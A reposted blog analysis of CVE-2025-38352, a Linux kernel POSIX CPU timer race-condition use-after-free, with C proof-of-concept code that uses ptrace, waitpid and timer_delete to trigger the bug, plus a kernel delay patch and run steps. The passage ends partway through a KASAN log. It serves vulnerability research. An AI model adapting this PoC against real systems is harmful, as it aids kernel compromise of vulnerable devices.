2026-01-26 14:42:26 | Cybersecurity articles | Source: ZONE.CI Global Network

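Summary: This article analyzes CVE-2025-38352, a race-condition use-after-free in the Linux kernel's POSIX CPU timers that has been exploited in the wild. It explains how reaping a zombie task and deleting a timer create the race window, walks through the test environment and the PoC code, shows how ptrace is used to control task state and trigger the bug, and discusses what makes exploitation difficult. Overall score: 95. Categories: vulnerability analysis, vulnerability PoC, binary security.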


CVE-2025-38352 Part 1: Analysis and PoC of an Android Kernel Race-Condition UAF Exploited in the Wild

Faraz

securitainment

January 26, 2026, 10:24, Guangdong

| Original link | Author |
| --- | --- |
| https://faith2dxy.xyz/2025-12-22/cve_2025_38352_analysis/ | Faraz |

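CVE-2025-38352 is a race-condition use-after-free vulnerability in the Linux kernel's POSIX CPU timers implementation. It was reported to be under limited, targeted exploitation in the wild.

An analysis of this vulnerability has already been published by @streypaws. Their blog post does a good job of explaining how POSIX CPU timers work and which conditions are needed to trigger the bug. Here is the link:

https://streypaws.github.io/posts/Race-Against-Time-in-the-Kernel-Clockwork/

Since their post did not include a PoC that triggers the vulnerability, I decided to turn my Sunday evening into a study night and write one myself.

This post briefly walks through how I analyzed the vulnerability and wrote the PoC. I also hope it shows how valuable this approach is for learning something new.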

PoC

If you just want the PoC, you can find it here:

https://github.com/farazsth98/poc-CVE-2025-38352

Patch Commit

The patch commit is here:

https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=f90fff1e152dedf52b932240ebbd670d83330eca

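Setup TL;DR

Kernel Version

I used LTS kernel version 6.12.33, since it was the most recent LTS release at the time that was still affected by the bug.

CONFIG_POSIX_CPU_TIMERS_TASK_WORK

The patch commit notes that the vulnerability cannot be triggered when CONFIG_POSIX_CPU_TIMERS_TASK_WORK is enabled.

@streypaws's post mentions that they were unable to turn off the CONFIG_POSIX_CPU_TIMERS_TASK_WORK option. The reason is that, by default, it is an internal option defined in kernel/time/Kconfig. It has no prompt string, so it never shows up in the configuration menu:

config HAVE_POSIX_CPU_TIMERS_TASK_WORK
    bool

config POSIX_CPU_TIMERS_TASK_WORK
    bool
    default y if POSIX_TIMERS && HAVE_POSIX_CPU_TIMERS_TASK_WORK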

In addition, HAVE_POSIX_CPU_TIMERS_TASK_WORK is selected in both arch/x86/Kconfig and arch/arm64/Kconfig. As a result, the vulnerability is effectively only exploitable on 32-bit Android devices, which also explains why it was described as being under limited, targeted exploitation.

To be able to turn the option off, modify POSIX_CPU_TIMERS_TASK_WORK in kernel/time/Kconfig as follows:

config POSIX_CPU_TIMERS_TASK_WORK
    bool "CVE-2025-38352: POSIX_CPU_TIMERS_TASK_WORK toggle" if EXPERT
    depends on POSIX_TIMERS && HAVE_POSIX_CPU_TIMERS_TASK_WORK
    default y
    help
      For CVE-2025-38352 analysis.

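You can now toggle the option through make menuconfig.

For reference, I used the kernelCTF LTS config as a base and made only the change above, so that CONFIG_POSIX_CPU_TIMERS_TASK_WORK could be disabled.

I also enabled full preemption in make menuconfig (search for PREEMPT in the menu), because Android kernels enable it by default.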
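Before building, it can be worth confirming that the option really ended up disabled in the generated .config. The helper below is a minimal sketch of such a check, not part of the original PoC: the function name config_option_enabled() is hypothetical, and it assumes the usual .config convention where an enabled bool appears as "OPTION=y" and a disabled one as "# OPTION is not set".

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/*
 * Hypothetical helper: return 1 if `config_text` (the contents of a kernel
 * .config file) contains a line that is exactly "<option>=y", else 0.
 * A disabled bool option is normally written as "# <option> is not set",
 * which does not match.
 */
int config_option_enabled(const char *config_text, const char *option)
{
    assert(config_text != NULL && option != NULL);

    size_t opt_len = strlen(option);
    const char *line = config_text;

    while (line != NULL && *line != '\0') {
        const char *eol = strchr(line, '\n');
        size_t len = eol ? (size_t)(eol - line) : strlen(line);

        /* The whole line must be "<option>=y", nothing more. */
        if (len == opt_len + 2 &&
            strncmp(line, option, opt_len) == 0 &&
            strncmp(line + opt_len, "=y", 2) == 0)
            return 1;

        line = eol ? eol + 1 : NULL;
    }
    return 0;
}
```

For the setup described here, calling it on the .config contents with "CONFIG_POSIX_CPU_TIMERS_TASK_WORK" should return 0 once the option has been switched off.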

QEMU Configuration

Because this is a race condition, at least two CPUs are needed to trigger it. I tested in a QEMU VM with 4 vCPUs:

qemu-system-x86_64 \
    -enable-kvm \
    -cpu host \
    -smp cores=4 \
# [ ... ]
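The PoC programs later in this post pin their threads to CPUs 0, 1, and 2, so the VM needs at least three online CPUs for the pinning to work as intended. The sketch below shows one way to check that at startup. The function names are hypothetical, and it assumes CPUs are numbered contiguously from 0, which holds for a plain QEMU -smp setup but not necessarily elsewhere.

```c
#define _GNU_SOURCE
#include <assert.h>
#include <unistd.h>

/* Number of CPUs currently online, as reported by sysconf(). */
long online_cpus(void)
{
    return sysconf(_SC_NPROCESSORS_ONLN);
}

/*
 * Return 1 if a CPU with index `highest_cpu_index` exists when `online`
 * CPUs are numbered 0..online-1 (assumption: contiguous numbering).
 */
int cpus_sufficient(long online, int highest_cpu_index)
{
    assert(highest_cpu_index >= 0);
    return online > highest_cpu_index;
}
```

A program could call cpus_sufficient(online_cpus(), 2) before pinning and bail out early if it returns 0.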

Vulnerability Recap

I strongly recommend reading @streypaws's blog post (linked above) before continuing. Here I only add the parts that matter for actually triggering the bug.

On every per-CPU scheduler tick, the kernel calls run_posix_cpu_timers() on that CPU. If a timer is ready to fire, that function eventually calls handle_posix_cpu_timers().

The vulnerability exists because handle_posix_cpu_timers() is still allowed to run after the task has become a zombie (that is, after the task's tsk->exit_state has been set to EXIT_ZOMBIE).

Let's take a quick look at handle_posix_cpu_timers() to understand the key points:

static void handle_posix_cpu_timers(struct task_struct *tsk)
{
    struct k_itimer *timer, *next;
    unsigned long flags, start;
    LIST_HEAD(firing); // Faith: local list of timers

    // Faith: acquire tsk->sighand->siglock
    if (!lock_task_sighand(tsk, &flags))
        return;

    do {
        // [ 1 ]
        // Collect all firing timers into the `firing` list
        check_thread_timers(tsk, &firing);
        check_process_timers(tsk, &firing);

        // [ ... ]
    } while (!posix_cpu_timers_enable_work(tsk, start));

    // Faith: release tsk->sighand->siglock
    unlock_task_sighand(tsk, &flags);

    // Faith: RACE WINDOW START

    // [ 2 ]
    // Faith: Iterate over the `firing` list and fire the timers
    list_for_each_entry_safe(timer, next, &firing, it.cpu.elist) {
        // [ ... ]
        // Faith: RACE WINDOW ENDS after the timer is finished being
        //        accessed.
    }
}

Following my comments in the code above, and assuming there is only one firing timer:

1. After acquiring tsk->sighand->siglock, the function collects the firing timer and puts it on the local firing list. Note that this step removes the timer from the task.
2. Once the timer has been collected, tsk->sighand->siglock is released, and the function walks the local firing list and fires the timer.

If the task is a zombie, a race window opens right after tsk->sighand->siglock is released. Within that window, another process can do the following two things to free the timer that sits on the firing list:

1. Reap the zombie task. The parent process can do this with waitpid().
2. Call the timer_delete() syscall. This calls posix_cpu_timer_del() and frees the timer through RCU.

When the parent reaps the zombie task, release_task() is called on it, which eventually sets tsk->sighand to NULL via __exit_signal():

static void __exit_signal(struct task_struct *tsk)
{
    // [ ... ]

    sighand = rcu_dereference_check(tsk->sighand,
                    lockdep_tasklist_lock_is_held());
    spin_lock(&sighand->siglock);

    // [ ... ]

    tsk->sighand = NULL; // Faith: HERE
    spin_unlock(&sighand->siglock);

    // [ ... ]
}

After that, when posix_cpu_timer_del() is called through timer_delete(), it finds that tsk->sighand is NULL and simply returns 0:

static int posix_cpu_timer_del(struct k_itimer *timer)
{
    // [ ... ]
    int ret = 0;

    // [ ... ]
    sighand = lock_task_sighand(p, &flags);
    if (unlikely(sighand == NULL)) {
        WARN_ON_ONCE(ctmr->head || timerqueue_node_queued(&ctmr->node));
    } else {
        // [ ... ]
    }

out:
    // [ ... ]
    return ret;
}

Once posix_cpu_timer_del() returns 0, control goes back to the timer_delete() syscall handler, which calls posix_timer_unhash_and_free() to free the timer:

SYSCALL_DEFINE1(timer_delete, timer_t, timer_id)
{
    // [ ... ]
retry_delete:
    // [ ... ]
    // Faith: timer_delete_hook() calls posix_cpu_timer_del()
    if (unlikely(timer_delete_hook(timer) == TIMER_RETRY)) {
        /* Unlocks and relocks the timer if it still exists */
        timer = timer_wait_running(timer, &flags);
        goto retry_delete;
    }

    // [ ... ]
    posix_timer_unhash_and_free(timer);
    return 0;
}

The actual free goes through RCU, so it does not happen immediately:

static void posix_timer_unhash_and_free(struct k_itimer *tmr)
{
    // [ ... ]
    posix_timer_free(tmr);
}

static void posix_timer_free(struct k_itimer *tmr)
{
    // [ ... ]
    call_rcu(&tmr->rcu, k_itimer_rcu_free);
}

If all of the above happens inside the race window described earlier, then the UAF is triggered when handle_posix_cpu_timers() walks its local firing list and accesses the timer:

static void handle_posix_cpu_timers(struct task_struct *tsk)
{
    // [ ... ]
    // Faith: Iterate over the `firing` list and fire the timers
    list_for_each_entry_safe(timer, next, &firing, it.cpu.elist) {
        // [ ... ]
        // Faith: UAF occurs here
    }
}
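The ordering described above can be captured in a tiny single-threaded model. This is only an illustrative sketch: every type and function below is a made-up stand-in, nothing is actually freed, and the "sighand still present" branch reflects my understanding that posix_cpu_timer_del() reports TIMER_RETRY for a timer that is currently firing, which the excerpts above do not show.

```c
#include <assert.h>
#include <stdbool.h>

/* Toy stand-ins; none of these are kernel types. */
struct toy_timer {
    bool queued_on_task;  /* still linked on the task's timer queue */
    bool on_firing_list;  /* collected into the local `firing` list */
    bool freed;           /* models the RCU free having happened */
};

struct toy_task {
    bool has_sighand;     /* false once the zombie has been reaped */
};

/* Step [ 1 ]: under siglock, move the expired timer to the firing list. */
void toy_collect(struct toy_timer *t)
{
    assert(t->queued_on_task);
    t->queued_on_task = false;
    t->on_firing_list = true;
}

/* Reaping: release_task() -> __exit_signal() clears tsk->sighand. */
void toy_reap(struct toy_task *tsk)
{
    tsk->has_sighand = false;
}

/* timer_delete(): returns true if the timer ends up freed. */
bool toy_timer_delete(const struct toy_task *tsk, struct toy_timer *t)
{
    if (tsk->has_sighand && t->on_firing_list)
        return false;     /* assumed TIMER_RETRY path: caller waits */
    t->freed = true;      /* NULL sighand: freed unconditionally */
    return true;
}

/*
 * Replay the sequence. Returns true if step [ 2 ] (walking the firing
 * list) would touch a timer that has already been freed.
 */
bool toy_race(bool reap_in_window)
{
    struct toy_timer t = { .queued_on_task = true };
    struct toy_task tsk = { .has_sighand = true };

    toy_collect(&t);                 /* siglock held, then released */
    if (reap_in_window)
        toy_reap(&tsk);              /* parent calls waitpid() */
    toy_timer_delete(&tsk, &t);      /* other thread calls timer_delete() */
    return t.on_firing_list && t.freed;
}
```

In this model, toy_race(true) reports a stale access while toy_race(false) does not, which mirrors why the reap has to land inside the window before timer_delete() runs.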

Planning the PoC

Now that we know how the vulnerability is triggered, let's plan a PoC step by step.

Minimal POSIX CPU Timer PoC

First, we need a way to get execution into handle_posix_cpu_timers(). The following minimal PoC does that:

#include <time.h>
#include <signal.h>
#include <stdio.h>
#include <unistd.h>

// Notification callback; with SIGEV_THREAD it runs in a helper thread
void timer_fire(union sigval sv) {
    (void)sv;
    printf("Timer fired\n");
}

int main(void) {
    struct sigevent sev = {0};
    sev.sigev_notify = SIGEV_THREAD;
    sev.sigev_notify_function = timer_fire;

    timer_t timer;
    // timer_create() returns 0 on success, -1 on error
    int ret = timer_create(CLOCK_THREAD_CPUTIME_ID, &sev, &timer);
    printf("Timer created: %d\n", ret);

    struct itimerspec ts = {
        .it_interval = {0, 0},
        .it_value = {1, 0},
    };

    timer_settime(timer, 0, &ts, NULL);
    printf("Timer started: %d\n", ret);

    // Use up CPU time to fire the timer
    while (1);
}

- timer_create() creates a POSIX CPU timer that calls timer_fire() when it fires.
- timer_settime() arms the timer so that it fires once the current thread has consumed 1 second of CPU time.
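Since the timer counts CPU time consumed by the thread rather than wall-clock time, it can help to look at that clock directly. The following sketch, with hypothetical helper names, reads CLOCK_THREAD_CPUTIME_ID through clock_gettime() and spins until a given amount of thread CPU time has been used. It is meant as an aid for experimenting, not as part of the author's PoC.

```c
#define _POSIX_C_SOURCE 200809L
#include <assert.h>
#include <time.h>

/* CPU time consumed so far by the calling thread, in nanoseconds. */
long long thread_cpu_ns(void)
{
    struct timespec ts;
    int rc = clock_gettime(CLOCK_THREAD_CPUTIME_ID, &ts);

    assert(rc == 0);
    (void)rc;
    return (long long)ts.tv_sec * 1000000000LL + ts.tv_nsec;
}

/*
 * Busy-loop until the calling thread has used at least `ns` more
 * nanoseconds of CPU time. Returns the CPU time actually consumed.
 */
long long burn_cpu_ns(long long ns)
{
    long long start = thread_cpu_ns();
    long long now;

    do {
        now = thread_cpu_ns();
    } while (now - start < ns);

    return now - start;
}
```

Replacing the `while (1);` loop with a call such as burn_cpu_ns(2000000000LL) would give the 1-second timer above enough CPU time to expire and then let the program continue.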

Creating a Zombie Task

To understand how a task transitions to the EXIT_ZOMBIE exit state, let's look at exit_notify(). When a thread or process finishes running and exits, do_exit() calls exit_notify():

static void exit_notify(struct task_struct *tsk, int group_dead)
{
    // [ ... ]
    LIST_HEAD(dead);

    // [ ... ]

    tsk->exit_state = EXIT_ZOMBIE; // [ 1 ]

    // [ ... ]
    // [ 2 ]
    if (unlikely(tsk->ptrace)) {
        int sig = thread_group_leader(tsk) &&
                thread_group_empty(tsk) &&
                !ptrace_reparented(tsk) ?
            tsk->exit_signal : SIGCHLD;
        autoreap = do_notify_parent(tsk, sig);
    }

    // [ ... ]
    // [ 3 ]
    if (autoreap) {
        tsk->exit_state = EXIT_DEAD;
        list_add(&tsk->ptrace_entry, &dead);
    }

    // [ ... ]
    // [ 4 ]
    list_for_each_entry_safe(p, n, &dead, ptrace_entry) {
        list_del_init(&p->ptrace_entry);
        release_task(p);
    }
}

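Following the markers in the code above:

1. The task's exit state is initially set to EXIT_ZOMBIE unconditionally.
2. If the task is currently being ptraced, autoreap is set to the return value of do_notify_parent(). As long as the parent process does not ignore SIGCHLD signals, do_notify_parent() returns false.
3. If autoreap is true, the task's exit state is changed to EXIT_DEAD and the task is added to the local dead list.
4. The local dead list is walked, and release_task() is called on each task in it.

From the analysis in the previous section, we know that release_task() sets tsk->sighand to NULL.

However, we want handle_posix_cpu_timers() to be able to lock tsk->sighand->siglock and collect our firing timer onto its local firing list, so we do not want the task to be released here.

Therefore, to create a zombie task here, tsk->ptrace must be set, which means a parent process must be ptracing the task. The parent must also not ignore SIGCHLD signals.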
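The decision at markers [ 2 ] and [ 3 ] can be summarized as a small pure function. This is a simplified sketch with hypothetical names, not kernel code. The two non-ptraced branches are elided in the excerpt above and are filled in here from my reading of upstream kernel/exit.c, so treat them as an assumption. do_notify_parent() is reduced to a single flag saying whether the parent ignores SIGCHLD.

```c
#include <assert.h>
#include <stdbool.h>

/* Toy exit states; the real EXIT_ZOMBIE / EXIT_DEAD values differ. */
enum toy_exit_state { TOY_EXIT_ZOMBIE, TOY_EXIT_DEAD };

/*
 * Simplified model of how exit_notify() picks the final exit state.
 * `parent_ignores_sigchld` stands in for do_notify_parent() returning true.
 */
enum toy_exit_state toy_exit_notify(bool ptraced,
                                    bool group_leader,
                                    bool group_empty,
                                    bool parent_ignores_sigchld)
{
    bool autoreap;

    if (ptraced)
        autoreap = parent_ignores_sigchld;                /* marker [ 2 ] */
    else if (group_leader)
        autoreap = group_empty && parent_ignores_sigchld; /* assumed branch */
    else
        autoreap = true;  /* assumed: untraced non-leader thread */

    /* marker [ 3 ]: autoreap turns the zombie into EXIT_DEAD right away */
    return autoreap ? TOY_EXIT_DEAD : TOY_EXIT_ZOMBIE;
}
```

Under this model, a non-leader thread only stays a zombie when it is ptraced and the tracer does not ignore SIGCHLD, which matches the conclusion above.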

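Reaping the Zombie Task

In the context of threads and processes, "reaping" means fully freeing and reclaiming a task (mainly the task_struct allocated for it). The final step of reaping is usually the kernel calling release_task() on the task.

Calling waitpid(zombie_task_pid, ...) from the parent ptracer process reaps the zombie task. The call stack we want to reach is:

do_wait()
  -> __do_wait()
    -> do_wait_pid()
      -> wait_consider_task()
        -> wait_task_zombie()
          -> release_task()

There is too much code along this call stack to show in full. To reap the zombie task successfully and have the kernel call release_task(), the following key conditions must hold:

1. do_wait_pid() is only reached when we specify a PID (as opposed to a TGID, PGID, and so on).
2. wait_task_zombie() is only called when both of the following are true:
   - The zombie task is being ptraced.
   - The zombie task is not the current thread group leader (by default, the thread group leader is the process's main thread).

To satisfy these conditions, the zombie task must be a non-main thread of a process that is being ptraced by the parent.

In addition, the parent must pass the zombie task's thread ID (which is essentially a PID) to waitpid(), so the child needs some way of telling the parent that thread ID.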
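One simple way to hand the thread ID to the parent is a pipe, which is also what the PoC in the next section does. The sketch below wraps that exchange in small helpers that retry on EINTR and short transfers. The helper names are hypothetical and the error handling is deliberately minimal.

```c
#define _GNU_SOURCE
#include <assert.h>
#include <errno.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>

/* Kernel thread ID of the calling thread. */
pid_t current_tid(void)
{
    return (pid_t)syscall(SYS_gettid);
}

/* Write exactly `len` bytes; returns 0 on success, -1 on error. */
int write_full(int fd, const void *buf, size_t len)
{
    const char *p = buf;

    while (len > 0) {
        ssize_t n = write(fd, p, len);
        if (n < 0) {
            if (errno == EINTR)
                continue;
            return -1;
        }
        p += n;
        len -= (size_t)n;
    }
    return 0;
}

/* Read exactly `len` bytes; returns 0 on success, -1 on error or EOF. */
int read_full(int fd, void *buf, size_t len)
{
    char *p = buf;

    while (len > 0) {
        ssize_t n = read(fd, p, len);
        if (n < 0) {
            if (errno == EINTR)
                continue;
            return -1;
        }
        if (n == 0)
            return -1;  /* writer closed the pipe early */
        p += n;
        len -= (size_t)n;
    }
    return 0;
}

/* Child side: send a thread ID to the parent. */
int send_tid(int fd, pid_t tid)
{
    return write_full(fd, &tid, sizeof(tid));
}

/* Parent side: receive the thread ID to pass to waitpid(). */
int recv_tid(int fd, pid_t *tid)
{
    assert(tid != NULL);
    return read_full(fd, tid, sizeof(*tid));
}
```

The thread that will become the zombie would call send_tid(c2p[1], current_tid()), and the parent would call recv_tid(c2p[0], &tid) before attaching.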

Reaping the Zombie Task in a Controlled Way

The following PoC demonstrates how a parent process can fully control when a non-main thread of its child process gets reaped:

#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <sched.h>
#include <pthread.h>
#include <sys/ptrace.h>
#include <sys/wait.h>
#include <err.h>
#include <sys/prctl.h>
#include <sys/syscall.h>

// Exit with an error message if a syscall-style call returns -1
#define SYSCHK(x) ({                \
    typeof(x) __res = (x);          \
    if (__res == (typeof(x))-1)     \
        err(1, "SYSCHK(" #x ")");   \
    __res;                          \
})

// Pin the calling thread to CPU `i`
void pin_on_cpu(int i) {
    cpu_set_t mask;
    CPU_ZERO(&mask);
    CPU_SET(i, &mask);
    sched_setaffinity(0, sizeof(mask), &mask);
}

pthread_t reapee_thread;
pthread_barrier_t barrier;
int c2p[2]; // child to parent
int p2c[2]; // parent to child

void *reapee(void *arg) {
    (void)arg;
    pin_on_cpu(2);
    prctl(PR_SET_NAME, "REAPEE");

    // Send this thread's TID to the parent process
    pid_t tid = (pid_t)syscall(SYS_gettid);
    SYSCHK(write(c2p[1], &tid, sizeof(pid_t)));

    // Wait for the parent to attach
    pthread_barrier_wait(&barrier);

    // Returning exits the thread, which then becomes a zombie
    return NULL;
}

int main(int argc, char *argv[]) {
    // Parent and child setup
    // Use pipes to communicate between parent and child
    SYSCHK(pipe(c2p));
    SYSCHK(pipe(p2c));

    pid_t pid = SYSCHK(fork());

    if (pid) {
        // parent
        pin_on_cpu(1);
        char m = 0;
        close(c2p[1]);
        close(p2c[0]);

        // Receive child process's REAPEE thread's TID
        pid_t tid;
        SYSCHK(read(c2p[0], &tid, sizeof(pid_t)));
        printf("Parent: reapee thread ID: %d\n", tid);

        // Attach to the REAPEE thread and continue it
        printf("Parent: attaching to REAPEE thread\n");
        SYSCHK(ptrace(PTRACE_ATTACH, tid, NULL, NULL));
        SYSCHK(waitpid(tid, NULL, __WALL));
        SYSCHK(ptrace(PTRACE_CONT, tid, NULL, NULL));

        // Signal to child that we attached and continued
        SYSCHK(write(p2c[1], &m, 1));

        // Reap the REAPEE thread now
        printf("Parent: press enter to reap REAPEE thread\n");
        getchar();
        SYSCHK(waitpid(tid, NULL, __WALL));
        printf("Parent: detached from REAPEE\n");

        sleep(5);
    } else {
        // child
        pin_on_cpu(0);
        char m;
        close(c2p[0]);
        close(p2c[1]);

        prctl(PR_SET_NAME, "CHILD_MAIN");
        pthread_barrier_init(&barrier, NULL, 2);
        pthread_create(&reapee_thread, NULL, reapee, NULL);

        printf("Thread created\n");

        // Parent process writes to us when attached and continued, use
        // a barrier to continue the REAPEE thread now
        SYSCHK(read(p2c[0], &m, 1));
        pthread_barrier_wait(&barrier);

        pause();
    }
}

When running this PoC, attach GDB to the kernel once you see the following output:

Thread created
Parent: reapee thread ID: 152
Parent: attaching to REAPEE thread
Parent: press enter to reap REAPEE thread

In GDB, set a breakpoint on release_task() and continue execution. You can then press enter at any time to trigger release_task():

gef> p p->comm
$1 = "REAPEE\000\000\000\000\000\000\000\000\000"

gef> bt
#0  release_task (p=p@entry=0xffff88800892d280) at kernel/exit.c:245
#1  0xffffffff811a549f in wait_task_zombie (p=0xffff88800892d280, wo=0xffffc90000627eb0) at kernel/exit.c:1254
#2  wait_consider_task (wo=wo@entry=0xffffc90000627eb0, ptrace=<optimized out>, ptrace@entry=0x1, p=0xffff88800892d280) at kernel/exit.c:1481
#3  0xffffffff811a6cd6 in do_wait_pid (wo=0xffffc90000627eb0) at kernel/exit.c:1629
#4  __do_wait (wo=wo@entry=0xffffc90000627eb0) at kernel/exit.c:1655
#5  0xffffffff811a6d86 in do_wait (wo=wo@entry=0xffffc90000627eb0) at kernel/exit.c:1696

Note that release_task() is also called periodically to reap kworker threads. When the breakpoint hits for one of those, ignore it and continue.

Writing the PoC

Now we can finally start writing the PoC!

Extending the Race Window with a Kernel Patch

To make the bug easier to trigger, I added a 500 ms delay inside handle_posix_cpu_timers() to widen the race window. This makes the PoC more stable:

static void handle_posix_cpu_timers(struct task_struct *tsk)
{
    // [ ... ]
    unlock_task_sighand(tsk, &flags);

    // Faith: extend the race window
    if (strcmp(tsk->comm, "SLOWME") == 0) {
        printk("Faith: Did we win? tsk->exit_state: %d\n", tsk->exit_state);
        mdelay(500);
    }

    // [ ... ]
}

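As it turned out, though, this patch is almost required. I did see the bug trigger once or twice without it, but that was extremely rare, for two reasons:

1. By default, with a single timer (which is the case in my PoC below), the race window is only about 3,000 to 4,000 ns, and landing both the reap and the free inside that window is very difficult.
2. The timer is freed through RCU, which will most likely take longer than 4,000 ns.

My guess is that I simply got lucky those few times: some odd behavior kept the race window open long enough for both conditions to be met. It is definitely not reliable.

To see how I wrote a PoC that does not need the delay patch above, see Part 2 of this series!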

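Triggering the Race Condition

To trigger the race condition, we need to combine the two PoCs from the previous sections and make sure the POSIX CPU timer fires after exit_notify() has changed tsk->exit_state to EXIT_ZOMBIE.

In practice this means that when the non-main thread of the child process exits, it must have "just enough" CPU time left before the timer expires, so that do_exit() in the kernel has time to call exit_notify() and turn the task into a zombie before the timer fires.

But there must not be too much CPU time left either! Otherwise do_exit() runs to completion after consuming only the CPU time it needs, and if the timer still requires more CPU time beyond that point, it will never fire at all.

After some trial and error, setting the CPU time to 250,000 ns worked well in my local environment.

Let's now walk through the key parts of the final PoC step by step (the full PoC is at the end of this post).

Implementing a Custom Wait Time

First, I accept a custom wait_time through argv[1] to make testing easier. This value is the amount of CPU time that has to be consumed before the timer fires:

long int wait_time = 250000; // Works for me

int main(int argc, char *argv[]) {
    // Use a custom wait time to figure out the exact timing when the
    // timer will fire right after `exit_notify()` sets the task's
    // state to EXIT_ZOMBIE.
    if (argc > 1) {
        wait_time = strtol(argv[1], NULL, 10);
        printf("Custom wait time: %ld\n", wait_time);
    }

    // [ ... ]
}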
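The snippet above passes whatever strtol() returns straight into the timer setup. Because the value later ends up in the tv_nsec field of a timespec, it has to stay below one second (timer_settime() rejects larger tv_nsec values with EINVAL), and a value of 0 with tv_sec also 0 would disarm the timer instead of arming it. A stricter parser might look like the sketch below. The function name parse_wait_time() is hypothetical and this is not how the original PoC handles its argument.

```c
#include <assert.h>
#include <errno.h>
#include <stdlib.h>

#define NSEC_PER_SEC 1000000000L

/*
 * Parse a wait time in nanoseconds from `s`.
 * Accepts only plain decimal values in the range 1..999999999, so the
 * result is always a valid, non-zero tv_nsec.
 * Returns 0 and stores the value in *out on success, -1 otherwise.
 */
int parse_wait_time(const char *s, long *out)
{
    char *end = NULL;
    long v;

    assert(s != NULL && out != NULL);

    errno = 0;
    v = strtol(s, &end, 10);

    /* Reject overflow, empty input, and trailing garbage. */
    if (errno != 0 || end == s || *end != '\0')
        return -1;
    /* Reject values that cannot be used as a one-shot tv_nsec. */
    if (v <= 0 || v >= NSEC_PER_SEC)
        return -1;

    *out = v;
    return 0;
}
```

With this helper, main() could keep the 250000 default whenever parse_wait_time(argv[1], &wait_time) returns -1.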

Setting Up the Timer

Next, we create a POSIX CPU timer in the reapee thread and arm it to fire after the custom wait_time.

The thread name must also be set to SLOWME, so that the thread is affected by the custom mdelay() patch we added to handle_posix_cpu_timers():

void *reapee(void *arg) {
    (void)arg;
    pin_on_cpu(2);
    struct sigevent sev = {0};
    sev.sigev_notify = SIGEV_THREAD;
    sev.sigev_notify_function = timer_fire;

    prctl(PR_SET_NAME, "SLOWME");

    // Send this thread's TID to the parent process
    pid_t tid = (pid_t)syscall(SYS_gettid);
    SYSCHK(write(c2p[1], &tid, sizeof(pid_t)));

    printf("Creating timer\n");
    SYSCHK(timer_create(CLOCK_THREAD_CPUTIME_ID, &sev, &timer));
    printf("Timer created\n");

    struct itimerspec ts = {
        .it_interval = {0, 0},
        .it_value = {0, wait_time}, // Custom wait time
    };

    // Wait for parent to attach
    pthread_barrier_wait(&barrier);

    SYSCHK(timer_settime(timer, 0, &ts, NULL));

    // Use some CPU time to make sure the timer will fire correctly.
    // `volatile` keeps the compiler from optimizing the loop away.
    for (volatile int i = 0; i < 1000000; i++);

    return NULL;
}

Reaping the Timer Thread and Deleting the Timer

Finally, the parent and child processes need to do the following:

- Parent process: reap the REAPEE thread as before, then wait for the child process to free the timer.
- Child process: wait for the parent to reap the REAPEE thread, then call timer_delete() to delete the timer.

int main(int argc, char *argv[]) {
    // [ ... ]
    pid_t pid = SYSCHK(fork());

    if (pid) {
        // parent
        // [ ... ]

        // Signal to child that we attached and continued
        SYSCHK(write(p2c[1], &m, 1));

        // Reap the REAPEE thread now
        printf("Parent: reaping REAPEE thread\n");
        SYSCHK(waitpid(tid, NULL, __WALL));
        printf("Parent: detached from REAPEE\n");

        // Let the child process know REAPEE is reaped
        SYSCHK(write(p2c[1], &m, 1));

        // Let the child process delete and free the timer
        // before exiting
        SYSCHK(read(c2p[0], &m, 1));
    } else {
        // child
        // [ ... ]

        // Parent process writes to us when attached and continued, use
        // a barrier to continue the REAPEE thread now
        SYSCHK(read(p2c[0], &m, 1));
        pthread_barrier_wait(&barrier);

        // Parent process writes to us when waitpid() returns successfully.
        //
        // At this point, if we won the race, `handle_posix_cpu_timers()` will be in
        // the patched `mdelay(500)` with `tsk->exit_state != 0`, and calling
        // `timer_delete()` should make it see a NULL `sighand`, which will cause it to
        // just free the timer unconditionally.
        SYSCHK(read(p2c[0], &m, 1));
        timer_delete(timer);
        printf("Child: timer deleted\n");

        // Let the timer be freed by RCU, then let the parent process know it can exit
        wait_for_rcu();
        SYSCHK(write(c2p[1], &m, 1));
        pause();
    }
}
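The wait_for_rcu() call in the code above is defined in the full PoC at the end of this post as a bare membarrier(MEMBARRIER_CMD_GLOBAL) syscall whose return value is ignored. As far as I can tell, the idea is that this command makes the kernel wait for an RCU grace period, although a grace period ending does not strictly guarantee that a callback queued with call_rcu() has already run. The sketch below is a more defensive variant with hypothetical function names. It first asks the kernel whether the command is supported and reports failure instead of silently continuing.

```c
#define _GNU_SOURCE
#include <assert.h>
#include <errno.h>
#include <linux/membarrier.h>
#include <sys/syscall.h>
#include <unistd.h>

/* Return 1 if the kernel reports support for MEMBARRIER_CMD_GLOBAL. */
int membarrier_global_supported(void)
{
    /* MEMBARRIER_CMD_QUERY returns a bitmask of supported commands. */
    long mask = syscall(__NR_membarrier, MEMBARRIER_CMD_QUERY, 0, 0);

    if (mask < 0)
        return 0;  /* syscall unavailable or blocked */
    return (mask & MEMBARRIER_CMD_GLOBAL) != 0;
}

/*
 * Checked variant of the PoC's wait_for_rcu().
 * Returns 0 on success, -1 with errno set if the barrier could not run.
 */
int wait_for_rcu_checked(void)
{
    if (!membarrier_global_supported()) {
        errno = ENOSYS;
        return -1;
    }
    return (int)syscall(__NR_membarrier, MEMBARRIER_CMD_GLOBAL, 0, 0);
}
```

If wait_for_rcu_checked() returns -1, falling back to a short sleep before signalling the parent is one possible, if crude, alternative.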

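Testing the PoC

That's it! The steps to run the PoC are:

1. Compile it with gcc -o poc -static poc.c
2. Run it inside the VM with while true; do /poc; done

Note that the PoC does not win the race 100% of the time, so I use a bash while loop to rerun it until it hits.

You should first tune the default wait_time to a value that suits your test environment.

Let's look at what the splat looks like with and without KASAN 👀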

KASAN Splat

With KASAN enabled, a UAF write is observed:

[    9.995817] ==================================================================
[    9.999410] BUG: KASAN: slab-use-after-free in posix_timer_queue_signal+0x16a/0x1a0
[   10.003168] Write of size 4 at addr ffff88800e628188 by task SLOWME/179
[   10.006386]
[   10.007400] CPU: 2 UID: 0 PID: 179 Comm: SLOWME Not tainted 6.12.33 #7
[   10.007406] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014
[   10.007408] Call Trace:
[   10.007455]  <IRQ>
[   10.007468]  dump_stack_lvl+0x66/0x80
[   10.007487]  print_report+0xc1/0x610
